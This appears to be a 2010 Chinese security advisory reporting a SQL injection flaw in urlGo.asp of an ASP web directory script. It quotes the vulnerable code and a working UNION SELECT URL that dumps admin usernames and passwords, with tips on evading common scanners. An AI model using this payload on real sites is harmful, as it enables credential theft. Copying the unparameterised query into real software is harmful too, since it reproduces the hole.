深度学习(asp)网址导航 v3.0.4 存在Sql注入漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2010-02-13
深度学习(asp)网址导航 v3.0.4 存在Sql注入漏洞 影响版本:
v3.0.4 漏洞描述:
问题代码urlGo.asp:
<!--#include file="connDB.asp"-->
<!--#include file="include/Function.Common.asp"-->

<%
id=request.QueryString("id")
if id="" then 
 response.Redirect("/")
end if
’-----网址--------------
Set rsWebUrl=Server.CreateObject("Adodb.Recordset")
sqlC="select  * from tWebUrl where fpassed=1 and fid=" & id
rsWebUrl.open sQLC,conn,0,1

if rsWebUrl.Eof and rsWebUrl.Bof then
 response.Redirect("/")
else
%>
很明显,可以注入,而且头文件由于程序员疏忽,很配合的没调用防注入系统.其他文件均调用防注入.
<*参考 
http://www.virusest.com/post/37.html
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!注意注入点用明小子或者啊D检测不出来,简单写下注入语句:
http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin
查密码只需把fusername改成fpassword,但是在测试的时候,发现因版本不同,可能表段长度不同,如果提示列数不匹配,则换成9个即可.SEBUG安全建议:
暂无